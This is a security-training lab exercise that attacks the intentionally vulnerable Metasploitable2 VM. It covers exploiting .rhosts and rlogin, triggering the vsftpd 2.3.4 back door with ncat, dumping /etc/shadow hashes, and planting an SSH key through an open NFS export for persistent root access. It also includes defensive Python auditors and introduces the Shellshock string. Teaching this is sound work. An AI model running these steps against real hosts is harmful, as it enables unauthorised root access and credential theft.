Section 10 Understanding Common Endpoint Attacks Lab

10.16 Understanding Common Endpoint Attacks

Explore Endpoint Attacks

You will perform several ethical hacking experiments as you work through this lab exercise. The focus is on
attacking endpoints. While there will be several specific attacks that you will perform, don't concentrate on the
specifics. There are innumerable specific attacks, and they come and go. Instead, concentrate on the bigger
picture. Where do the vulnerabilities lie? You will see misconfigurations, back-doored software,
vulnerabilities in base operating systems, and users who are vulnerable to social engineering. Also,
concentrate on bigger concepts such as pivoting, privilege escalation, persistence, and tunneling, each of
which is leveraged in this lab exercise.

Understand that the lab environment has been made conducive to the ethical hacking scenarios that are
described. For example, this lab exercise will make use of a Linux distribution that is known as Metasploitable
2, which is an intentionally vulnerable VM. Also, security technologies are not fully deployed. In later lab
exercises, you will see how various network security and endpoint security technologies can be used to thwart
the techniques that are demonstrated in this lab exercise.

Perform Reconnaissance
In the first half of this lab exercise, you will use the Metasploitable2 VM to demonstrate several potential
attack vectors. Metasploitable2 is an intentionally vulnerable Linux virtual machine. It has been deployed on
the DMZ with the hostname SploitMe.abc.public. To demonstrate this fully, the ABC-ASA firewall has been
configured to allow complete connectivity between the SploitMe host, and both the inside and external
networks.

Network attacks generally start with some reconnaissance. Reconnaissance is used throughout attack
campaigns. As one host is compromised, it can be used as a pivot, and reconnaissance can be performed to
reach deeper into the victim’s network. Assume that some footprinting exercises have been done and you
know that there is a host that is named sploitme.abc.public that is Internet-facing. In this section of the lab
exercise, you will perform an nmap scan against the SploitMe host.

Task 1
Access the desktop of Outside-Kali. Open a Terminal Window on Outside-Kali.
Task 2
Execute an nmap scan with the -sV option against the sploitme.abc.public host from the Outside Kali
terminal window. The nmap -sV option probes for open ports to determine the service and version
information. Be patient because this scan generally takes a little over 2 minutes to complete.

Answer
root@Outside-Kali:~# nmap -sV sploitme.abc.public

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-27 07:32 PDT


Nmap scan report for sploitme.abc.public (192.0.2.15)
Host is up (0.0023s latency).
rDNS record for 192.0.2.15: SploitMe.abc.public
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Cisco PIX sanitized smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please
submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1524-TCP:V=7.01%I=7%D=10/4%Time=57F420AA%P=x86_64-pc-linux-gnu%r(NU
<…Fingerprint data omitted…>
Service Info: Hosts: localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; Device:
firewall; CPE: cpe:/o:linux:linux_kernel, cpe:/o:cisco:pix_firewall_software
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.79 seconds

Note the following:

• The SploitMe host has 23 open services.
• Several of these services have vulnerabilities that can be exploited in different ways. You will leverage
vulnerabilities in several of these services as you work through this lab exercise.
• One of the services (TCP port 1524) is unrecognized despite returning data. Therefore, towards the
end of the nmap output, nmap prompts you to submit the fingerprint of that service to
https://nmap.org/cgi-bin/submit.cgi?new-service. Part of that output was omitted from this
step's output example.

Exploit a Misconfiguration
Misconfigurations, bad decisions in configuration (valuing convenience over security), and using default
configurations (including credentials) are all too common. As the appreciation for security grows, these types
of vulnerabilities occur less often, but they certainly do occur. This lab task leverages a poorly configured
rlogin service, which provides admin convenience at the expense of security.

As you learned in the TCP/IP Attacks section, the Berkeley r-utilities are a set of Unix/Linux tools that feature
remote login (rlogin), remote copying (rcp), and remote command execution (rsh). These commands were
developed for password-free access to Unix/Linux machines. Although the r-utilities have some advantages,
they should be avoided because they can make access to the host extremely insecure, and transmissions using
the r-utilities are not encrypted.
In the previous task, you saw that the TCP port 513 login service is an open port on the sploitme.abc.public
host. Note that the open TCP 512 port is for the exec service (remote process execution), and the open TCP
514 port is for the shell service (remote shell).

Task 3
Access the desktop of Outside-Kali and open a terminal window.
Task 4
Execute the rlogin command from the Outside-Kali terminal window to remotely log in to the
sploitme.abc.public host in the DMZ.

Answer

root@Outside-Kali:~# rlogin sploitme.abc.public


Last login: Tue Sep 27 12:55:12 EDT 2016 from 209.165.200.235 on pts/1
Linux SploitMe 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@SploitMe:~#

Note the following:

• The prompt changed from root@Outside-Kali to root@SploitMe, indicating that you have a
successful remote console to the SploitMe host—without requiring you to enter any user credentials.

Task 5
Execute the whoami command to determine which user you are logged in as on the sploitme.abc.public host.

Answer

root@SploitMe:~# whoami
root
root@SploitMe:~#

Note the following:

• You should see that you got logged in as the root user.
• By default, rlogin will log in to the remote host with the account that has the same name as the local host
account. Because you were logged in to the Outside-Kali host as the root user, you were able to
rlogin to the remote host also as the root user, simply by using the rlogin sploitme.abc.public
command. If you logged in as any other user name, you would have to specify root as the user with
the -l rlogin option (rlogin -l root sploitme.abc.public).
• With root access, you can perform root privileged activities on the exploited sploitme.abc.public host.

In the past, the use of r-utilities was more common, but now r-utilities are rarely used because of security
concerns. If the r-utilities are running on the host, the .rhosts files specify which remote users can access the
r-utilities (such as rsh, rcp, and rlogin) on the local system without a password. The .rhosts file is in a
specific user's (including root) home directory. If the r-utilities are not running on the host, then it doesn't
matter whether the .rhosts files exist. In this lab exercise, the SploitMe host has the rsh-client package installed and
running for this rlogin exploit demonstration.

Task 6
Examine the content of the .rhosts file. Execute the ls -a command to verify that the .rhosts file is there,
then use the cat .rhosts command to examine the .rhosts file content.

Answer

root@SploitMe:~# ls -a
. .config .gconf .profile .ssh
.. Desktop .gconfd .purple .vnc
.bash_history .filezilla .gstreamer-0.10 reset_logs.sh vnc.log
.bashrc .fluxbox .mozilla .rhosts .Xauthority

root@SploitMe:~# cat .rhosts


+ +
In the SploitMe .rhosts file, you should see that a plus sign (+) was entered in both the remote-host and user fields,
allowing any user from any host to log in to the local host. Below is another example of the .rhosts file where
only the secops user from the example1.com and example2.com hosts is allowed access.
example1.com secops
example2.com secops

Note the following:

• There are plenty of other things that can be performed as the root user, but this task is just enough to
demonstrate a simple exploit against rlogin and the .rhosts + + misconfiguration.
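An added example, not part of the lab, that audits .rhosts content for the wildcard entries described above. The two sample files are constructed from the SploitMe file and the restricted example:

```python
"""Audit a .rhosts file for wildcard trust entries (added example, not part of the lab)."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class RhostsEntry:
    host: str             # remote host name, "+" meaning any host
    user: Optional[str]   # remote user name, "+" meaning any user; None = same name as local user
    line_no: int


def parse_rhosts(text: str) -> List[RhostsEntry]:
    """Parse .rhosts content: one 'host [user]' pair per line, '#' starts a comment."""
    entries = []
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        user = fields[1] if len(fields) > 1 else None
        entries.append(RhostsEntry(fields[0], user, n))
    return entries


def audit_rhosts(text: str) -> List[str]:
    """Return one finding per entry that trusts any host, any user, or both."""
    findings = []
    for e in parse_rhosts(text):
        # entries starting with "-" deny access, so they are never over-permissive
        if e.host.startswith("-") or (e.user or "").startswith("-"):
            continue
        any_host, any_user = e.host == "+", e.user == "+"
        if any_host and any_user:
            findings.append(f"line {e.line_no}: '+ +' lets any user from any host log in")
        elif any_host:
            who = e.user or "a same-named account"
            findings.append(f"line {e.line_no}: any host may log in as {who}")
        elif any_user:
            findings.append(f"line {e.line_no}: any user on {e.host} may log in")
    return findings


# Constructed samples: the SploitMe file from the lab and the restricted form shown above.
SPLOITME_RHOSTS = "+ +\n"
RESTRICTED_RHOSTS = "example1.com secops\nexample2.com secops\n"

if __name__ == "__main__":
    for name, content in (("SploitMe", SPLOITME_RHOSTS), ("restricted", RESTRICTED_RHOSTS)):
        print(name, audit_rhosts(content) or ["no wildcard entries"])
```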

Task 7
Exit the rlogin session to the sploitme.abc.public host to return to the Outside-Kali shell.

Answer

root@SploitMe:~# exit
logout
rlogin: connection closed.
root@Outside-Kali:~#

Was getting root access to a remote host too easy? In a way, yes. Metasploitable 2 is an intentionally
vulnerable Linux virtual machine. Metasploitable2 can be used to conduct security training, test security tools,
and practice common penetration testing techniques.

The r-utilities have fallen out of favor, and SSH is now preferred. The .rhosts + + is a classic misconfiguration.
Before security consciousness evolved in TCP/IP networking, it was a common configuration, but you
shouldn't expect to see it in modern times. The focus is not this particular exploit—understand that
misconfigurations are still a common source of vulnerability. An inexperienced system administrator may
leave insecure default settings in place. Experienced system administrators will also make mistakes. Human
nature seeks convenience, and convenience is often at odds with security.

Note

For more information and to download the Metasploitable2 VM, refer to
https://community.rapid7.com/docs/DOC-1875.

Exploit a Back Door


Binary images can be hacked and the software distribution channels can also be hacked. To protect against
such hacks, the U.S. government introduced the Federal Information Processing Standard (FIPS) 140. The
FIPS-140 standard went into effect in 2011. To be FIPS-140 compliant, software must be digitally signed and
be verified for authenticity and integrity prior to load and execution. Digitally signed software offers increased
protection from the installation and loading of software that has been corrupted, modified, or hacked. For
example, Cisco IOS software images are digitally signed.

An example of software being hacked was the vsftpd-2.3.4.gz archive in the official distribution download
back in 2011. vsftpd, which stands for "Very Secure FTP Daemon", is an FTP server for Unix-like systems,
including Linux. The tampered vsftpd software was only posted for a few days, but anyone who downloaded
this hacked vsftpd software in that time period would unknowingly have the vsftpd software with the back
door. This vsftpd back door was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and
July 1st 2011, and was removed on July 3rd 2011.

A back door is a means of access to a system that bypasses security mechanisms. The system designer may
sometimes install a back door so that the system can be accessed for troubleshooting or other purposes.
However, threat actors often use back doors that they detect or install themselves to gain unauthorized system
access.

In this section of the lab exercise, you will leverage the vsftpd back door. This vsftpd back door on TCP port
6200 is activated by logging in to the FTP service with a username that ends in a smiley face (:)).

Task 8
Access the desktop of Outside-Kali. Open a terminal window on Outside-Kali.
Task 9
Execute the ftp sploitme.abc.public command from the Outside-Kali terminal window to FTP into the
sploitme.abc.public host in the DMZ. Enter user:) as the username, and simply press Enter for the
password.

Answer

Note: After entering the user:) username and pressing Enter for the password, you might think that the
terminal window is locked up. Don't worry! Simply open a second terminal window on the Outside Kali host
to continue to the next step.
root@Outside-Kali:~#
root@Outside-Kali:~# ftp sploitme.abc.public
Connected to sploitme.abc.public.
220 (vsFTPd 2.3.4)
Name (sploitme.abc.public:root): user:)
331 Please specify the password.
Password:

Task 10
Now, with the vsftpd back door active on the sploitme.abc.public host, use the ncat sploitme.abc.public
6200 -v command on the Outside Kali host second terminal window to remotely connect to the
sploitme.abc.public host.

Answer

ncat is a simple, but feature-packed, networking utility that reads and writes data across networks
from the command line. The 6200 argument specifies the TCP port number to connect to, and the -v
option specifies verbose output.
Terminal Window 2
root@Outside-Kali:~# ncat sploitme.abc.public 6200 -v
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.0.2.15:6200.
The back door does not provide a prompt like the normal bash shell, but commands are accepted and output is
displayed, as you will see in the next step.
Task 11
Execute the following commands on the remote sploitme.abc.public host from the ncat session to test the
back door connection:

1. Enter the whoami command to determine which user you are logged in as on the SploitMe host.
2. Enter the pwd command to determine the current directory path.
3. Enter the cat /etc/shadow command to display the hashes of the user passwords.

Answer

Terminal Window 2 (with the active ncat session)


root@Outside-Kali:~# ncat sploitme.abc.public 6200 -v
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.0.2.15:6200.
whoami
root
pwd
/
cat /etc/shadow
root:$1$bYuaYjHI$W/YxAkEVouSMmZqyXc6Wm/:17057:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
<…Output Omitted…>
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::

Note the following:

• You should see that this vsftpd back door provides root access.
• The /etc/shadow file, which stores hashes of the user passwords, is only readable by users with
root privileges.

Task 12
Enter Ctrl-C on both terminal windows to terminate the ncat and ftp sessions to the SploitMe host.

Answer
Terminal Window 2 (with the active ncat session)
root@Outside-Kali:~# ncat sploitme.abc.public 6200 -v
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.0.2.15:6200.
<output omitted>
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::

<Ctrl-C>

root@Outside-Kali:~#
Terminal Window 1 (with the active ftp session)
root@Outside-Kali:~# ftp sploitme.abc.public
Connected to sploitme.abc.public.
220 (vsFTPd 2.3.4)
Name (sploitme.abc.public:root): user:)
331 Please specify the password.
Password:

<Ctrl-C>
421 Service not available, remote server has closed connection

root@Outside-Kali:~#
Note: If you are still at an FTP prompt after using Ctrl-C, enter the exit command to terminate the FTP
client.

Was this back door access too easy? Again, yes and no. Metasploitable2 is loaded with vulnerabilities that are
easy to exploit if you know what they are and how to use them. But the ease of exploiting this vulnerability is
less important than the class of vulnerabilities. Back doors have been a common theme throughout the years.
This is not the only example of compromising the software distribution channel to get a back door released
into the wild. The idea of inserting a back door into an installable system can also be much more targeted if
particular users or groups can be tricked into downloading and installing the hacked software. Back doors are
often put into technology products by the developers. Prominent technology companies have been caught with
back doors in their products.
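As an added example (not part of the lab), here are the two defender-side indicators of this back door: the trigger sequence in FTP USER commands on the control channel, and an unexpected listener on TCP 6200 on the FTP server itself. The FTP control-channel lines and netstat output are constructed samples, and the listener parser assumes the netstat -tln column layout.

```python
"""Detect the vsftpd 2.3.4 back door trigger and its listener (added example, not the lab's code)."""
import re
from typing import Iterable, List

# The tampered vsftpd 2.3.4 opened a root shell on TCP 6200 when a login username
# contained the byte sequence ":)" (the lab uses "user:)").
TRIGGER = ":)"
BACKDOOR_PORT = 6200
USER_CMD = re.compile(r"^USER\s+(?P<name>\S.*?)\s*$", re.IGNORECASE)
# netstat -tln style line: proto recv-q send-q local-address foreign-address state
LISTEN_RE = re.compile(
    r"^tcp\S*\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTEN", re.IGNORECASE
)


def is_trigger_username(username: str) -> bool:
    """True when an FTP username carries the smiley sequence anywhere in it."""
    return TRIGGER in username


def scan_ftp_control(lines: Iterable[str]) -> List[str]:
    """Return usernames from USER commands (captured control channel) that would fire the back door."""
    hits = []
    for line in lines:
        m = USER_CMD.match(line.strip())
        if m and is_trigger_username(m.group("name")):
            hits.append(m.group("name"))
    return hits


def backdoor_listeners(netstat_lines: Iterable[str]) -> List[str]:
    """Return 'addr:port' for TCP sockets in LISTEN state on the back door port."""
    found = []
    for line in netstat_lines:
        m = LISTEN_RE.match(line.strip())
        if m and int(m.group("port")) == BACKDOOR_PORT:
            found.append(f"{m.group('addr')}:{m.group('port')}")
    return found


# Constructed sample data (not captured from the lab).
FTP_CONTROL_CAPTURE = [
    "220 (vsFTPd 2.3.4)",
    "USER alice",
    "331 Please specify the password.",
    "USER user:)",
    "331 Please specify the password.",
]
NETSTAT_OUTPUT = [
    "Proto Recv-Q Send-Q Local Address           Foreign Address         State",
    "tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN",
    "tcp        0      0 0.0.0.0:6200            0.0.0.0:*               LISTEN",
    "tcp        0      0 192.0.2.15:21           203.0.113.5:51022       ESTABLISHED",
]

if __name__ == "__main__":
    print("trigger usernames:", scan_ftp_control(FTP_CONTROL_CAPTURE))
    print("back door listeners:", backdoor_listeners(NETSTAT_OUTPUT))
```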

Escalate Privilege


A fundamental goal of any attack is to first take what is provided, which often means starting with lower-level
privilege access, and then escalate to a higher privilege level.

This lab task will leverage network file system (NFS) misconfiguration. The NFS protocol provides
transparent remote access to the shared file systems across the networks. The NFS protocol is designed to be
independent of the machine, the operating system, the network architecture, and the transport protocol. This
independence is achieved through the use of remote procedure call (RPC). RPC is a protocol that one program
can use to request a service from a program located in another computer in a network without having to
understand the network details.

The NFS misconfiguration gives threat actors the ability to remotely place files anywhere in the file system.
For example, a threat actor can place an SSH public key in the authorized keys file, then use the corresponding
private key to gain remote root SSH access.

Task 13
You will first start by performing a reconnaissance on the sploitme.abc.public host from the Outside Kali host.
Enter the rpcinfo -p sploitme.abc.public command on the Outside Kali host. The rpcinfo command
makes an RPC call to an RPC server and reports what it finds.

Answer
From the output, determine the running NFS versions, and which protocols and ports that NFS is using.
root@Outside-Kali:~# rpcinfo -p sploitme.abc.public
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 48355 status
100024 1 tcp 36644 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 41410 nlockmgr
100021 3 udp 41410 nlockmgr
100021 4 udp 41410 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 35516 nlockmgr
100021 3 tcp 35516 nlockmgr
100021 4 tcp 35516 nlockmgr
100005 1 udp 58233 mountd
100005 1 tcp 46570 mountd
100005 2 udp 58233 mountd
100005 2 tcp 46570 mountd
100005 3 udp 58233 mountd
100005 3 tcp 46570 mountd

Note the following:

• You should see that NFS versions 2, 3 and 4 are all running on both TCP and UDP port 2049.

Task 14
View the NFS export list using the showmount -e sploitme.abc.public command. The showmount
command is used to query the mount daemon on a remote host for information about the state of the NFS
server on that machine. The -e or --exports option displays the NFS server's export list.

Answer

root@Outside-Kali:~# showmount -e sploitme.abc.public


Export list for sploitme.abc.public:
/ *

Examine the showmount output:

• The first field (/) is the directory that is being exported. In this case, the root directory (/) is being
exported.
• The second field (*) is the network that is allowed to access the exported directory. This often looks
something like 10.10.4.0/24, but in this case it is *. The asterisk (*) means that any network can
access the exported directory.

Note the following:

• In this example, the NFS export list was intentionally misconfigured to allow any network access to
the root directory.
• A more typical restrictive NFS export list may look more like the following:

Export list for example.com:
/abc/volume1 10.10.10.10/32
/xyz/volume1 10.10.10.20/32
etc.
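An added example (not part of the lab) that turns the reading of showmount -e above into an audit: it parses the export list and flags exports open to any host, and exports of the root filesystem or other sensitive directories. The two sample listings are the ones shown above, constructed here as strings.

```python
"""Audit an NFS export list taken from showmount -e output (added example, not part of the lab)."""
from typing import Dict, List

# Exporting any of these hands out the whole system or files usable for persistence.
SENSITIVE_PATHS = ("/", "/root", "/etc", "/home", "/usr", "/var")
# Client forms that mean "no restriction": the * wildcard, showmount's (everyone), a catch-all CIDR.
ANY_CLIENT = ("*", "(everyone)", "0.0.0.0/0")


def parse_showmount(text: str) -> Dict[str, List[str]]:
    """Map each exported path to its client list; showmount prints 'path client[,client...]'."""
    exports: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list for"):
            continue
        parts = line.split(None, 1)
        clients = parts[1].split(",") if len(parts) > 1 else []
        exports[parts[0]] = [c.strip() for c in clients if c.strip()]
    return exports


def is_sensitive(path: str) -> bool:
    """True when the export is a sensitive directory or a parent that contains one (e.g. '/')."""
    prefix = path.rstrip("/") + "/"
    return any(p == path or p.startswith(prefix) for p in SENSITIVE_PATHS)


def audit_exports(text: str) -> List[str]:
    """Return one finding per problem: unrestricted client list, or sensitive path exported."""
    findings = []
    for path, clients in parse_showmount(text).items():
        if not clients or any(c in ANY_CLIENT for c in clients):
            findings.append(f"{path}: exported to any host")
        if is_sensitive(path):
            findings.append(f"{path}: exports a sensitive directory (root filesystem, /etc, /root, ...)")
    return findings


# Constructed copies of the two listings discussed above.
SHOWMOUNT_SPLOITME = "Export list for sploitme.abc.public:\n/ *\n"
SHOWMOUNT_TYPICAL = (
    "Export list for example.com:\n"
    "/abc/volume1 10.10.10.10/32\n"
    "/xyz/volume1 10.10.10.20/32\n"
)

if __name__ == "__main__":
    for label, listing in (("SploitMe", SHOWMOUNT_SPLOITME), ("typical", SHOWMOUNT_TYPICAL)):
        print(label, audit_exports(listing) or ["no findings"])
```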
Next, you will create an RSA key pair. Afterwards, you will place it onto the SploitMe host. The RSA key
pair that is saved on the SploitMe host will then be used to authenticate the remote SSH access to the
SploitMe host.

Task 15
From the Outside Kali host, you will first use the ssh-keygen command to create an RSA key pair. For this
demo, just pressing Enter on your keyboard when prompted for the filename and passphrase is fine. By
default, the generated RSA public key will be saved in the /root/.ssh/id_rsa.pub file on the Outside Kali host.

Answer

root@Outside-Kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f7:56:07:73:4f:db:1c:e3:5c:18:4b:fd:37:95:30:64 root@Outside-Kali
The key's randomart image is:
+---[RSA 2048]----+
| .E+..|
| ...=o|
| =o*|
| oBX|
| S . .+B|
| . . . . |
| o |
| . |
| |
+-----------------+

Note the following:

• An SSH server can authenticate clients using various methods. One of the most common methods is
RSA key authentication. To enable RSA key authentication, the client's public key is stored on the
SSH server. The public key must be added to the .ssh/authorized_keys file within the remote user's
home directory. When the client attempts to connect to the SSH server, the SSH server verifies whether the
client has a private key that corresponds with one of the authorized public keys. If the private key is
verified to match an authorized public key, the client is authenticated and a shell session is launched.
• Now you have a public/private key pair that will be used for the SSH authentication. In the next few
steps, you will mount the NFS file share, and put your public key in the authorized keys list for the
root user on the SploitMe host.

Task 16
Mount the NFS remote file share from the SploitMe host to the Outside Kali host. Begin by creating a
directory to use as the mount point. Use the mkdir sploitme command to create the sploitme directory in
which to place the NFS remote file share.

Answer

root@Outside-Kali:~# mkdir sploitme


Task 17
Use the mount -t nfs -o nolock sploitme.abc.public:/ sploitme command to mount the NFS
remote file share from the SploitMe host.

Answer
root@Outside-Kali:~# mount -t nfs -o nolock sploitme.abc.public:/ sploitme
Task 18
Use the ls sploitme command to examine the content of the sploitme NFS mount.

Answer

root@Outside-Kali:~# ls sploitme
bin dev initrd lost+found nohup.out root sys var
boot etc initrd.img media opt sbin tmp vmlinuz
cdrom home lib mnt proc srv usr

Note the following:

• The ls for the sploitme mount point is showing the root directory of the SploitMe host.

Task 19
Finally, use the cat ~/.ssh/id_rsa.pub >> sploitme/root/.ssh/authorized_keys command to copy
the RSA public key file to the /root/.ssh/authorized_keys file in the sploitme NFS mount. This command is a
bit tedious to type, so you can copy and paste it from the AttackingEndpoints.txt file in the SECFND folder
on the DVD drive (Cyber).

Answer

root@Outside-Kali:~# cat ~/.ssh/id_rsa.pub >> sploitme/root/.ssh/authorized_keys

Note the following:

• cat displays the contents of the ~/.ssh/id_rsa.pub file, and then >> redirects the output, appending it to
the end of sploitme/root/.ssh/authorized_keys (which is /root/.ssh/authorized_keys on the SploitMe
host). You now have your public key on the SploitMe host authorized key list!

Task 20
Execute the umount sploitme command to unmount the sploitme NFS mount on the Outside Kali host.

Answer

root@Outside-Kali:~# umount sploitme


After the unmount, use the ls command to display the contents of the sploitme directory again. The directory
should be empty.
root@Outside-Kali:~# ls sploitme
root@Outside-Kali:~#

Note the following:

• Now that you have successfully placed your RSA public key in the SploitMe host authorized key list,
in the next step, you will SSH to the SploitMe host as the root user.

Task 21
From the Outside Kali host, use the ssh sploitme.abc.public command to SSH to the SploitMe host. Then
use the whoami command to verify that you are logged in as the root user on the SploitMe host.

Answer
root@Outside-Kali:~# ssh sploitme.abc.public
The authenticity of host 'sploitme.abc.public (192.0.2.15)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'sploitme.abc.public,192.0.2.15' (RSA) to the list of known
hosts.
Last login: Tue Sep 27 13:21:11 2016 from 209.165.200.235
Linux SploitMe 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by


applicable law.

To access official Ubuntu documentation, please visit:


http://help.ubuntu.com/
You have new mail.

root@SploitMe:~# whoami
root

Note the following:

• You SSH to the SploitMe host as the root user because you are root on the Outside Kali host. If you
did not log in as the root user on the Outside Kali host, you would have to use ssh
root@sploitme.abc.public to SSH in as the root user.

Task 22
Exit out of the SSH session to the SploitMe host.

Answer

root@SploitMe:~# exit
logout
Connection to sploitme.abc.public closed.
root@Outside-Kali:~#

Again, there was a terrible NFS misconfiguration, which makes this exploit all too simple. But bigger concepts
are being demonstrated here. You first started with remote NFS file share access, and then you turned that into
SSH root access, which is an example of privilege escalation. You also have persistent access (meaning you
can still SSH to the SploitMe host, even if the SploitMe host is restarted), since your public key is stored in
the /root/.ssh/authorized_keys file. Persistent access is often the goal of a threat actor.
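An added example, not part of the lab, of the matching defensive check for this persistence technique: audit an authorized_keys file for keys whose fingerprint is not on a provisioning allowlist, or that lack a from= source restriction. The key blobs are constructed filler, not real keys, and the allowlist is assumed to have been recorded when the legitimate key was installed.

```python
"""Audit authorized_keys for unknown or unrestricted keys (added example, not the lab's code)."""
import base64
import hashlib
import shlex
from dataclasses import dataclass
from typing import List, Optional, Set

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


@dataclass
class AuthorizedKey:
    options: Optional[str]   # e.g. 'from=10.10.4.0/24,no-pty'; None when the line has no options
    key_type: str
    blob_b64: str
    comment: str
    line_no: int


def parse_authorized_keys(text: str) -> List[AuthorizedKey]:
    """Parse '[options] keytype base64 [comment]' lines; comments and blank lines are skipped."""
    keys = []
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)   # keeps quoted option values such as command="..." together
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            continue                 # malformed line; sshd ignores it as well
        options = " ".join(tokens[:idx]) or None
        comment = " ".join(tokens[idx + 2:])
        keys.append(AuthorizedKey(options, tokens[idx], tokens[idx + 1], comment, n))
    return keys


def fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint in the form ssh-keygen -lf prints: unpadded base64 of sha256(key blob)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(text: str, allowlist: Set[str]) -> List[str]:
    """Flag keys not in the fingerprint allowlist and keys with no from= source restriction."""
    findings = []
    for k in parse_authorized_keys(text):
        fp = fingerprint(k.blob_b64)
        label = k.comment or "no comment"
        if fp not in allowlist:
            findings.append(f"line {k.line_no}: unknown {k.key_type} key {fp} ({label})")
        if not k.options or "from=" not in k.options:
            findings.append(f"line {k.line_no}: key ({label}) has no from= restriction")
    return findings


# Constructed placeholders: these base64 blobs are filler bytes, not working RSA keys.
ADMIN_BLOB = "AAAAB3NzaC1yc2EAAAADAQABAAAAQQC0" + "A" * 60
ROGUE_BLOB = "AAAAB3NzaC1yc2EAAAADAQABAAAAQQDf" + "B" * 60
SAMPLE_AUTHORIZED_KEYS = (
    "# constructed /root/.ssh/authorized_keys\n"
    f'from="10.10.4.0/24",no-port-forwarding ssh-rsa {ADMIN_BLOB} admin@bastion\n'
    f"ssh-rsa {ROGUE_BLOB} root@Outside-Kali\n"
)

if __name__ == "__main__":
    known = {fingerprint(ADMIN_BLOB)}   # fingerprints recorded when the admin key was provisioned
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, known):
        print(finding)
```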

Exploit an Operating System Flaw


Vulnerabilities in software may take years to uncover. The Bash vulnerability Shell Shock is a great example.
The vulnerability was made public in 2014. Analysis of the source code history shows that the vulnerability
existed in version 1.03 of Bash. This version was released in 1989! The vulnerability existed for 25 years
before it was publicly documented! Bash is a Unix shell and command language.

Shell shock is a vulnerability in which the secret string, () { :; };, is used to inject a bash shell command within
something that is being parsed by bash. If a web server uses bash scripts to produce web page content, then
the secret string can be incorporated into an HTTP header along with a command allowing remote execution
of arbitrary code. This is an example of a command injection attack.
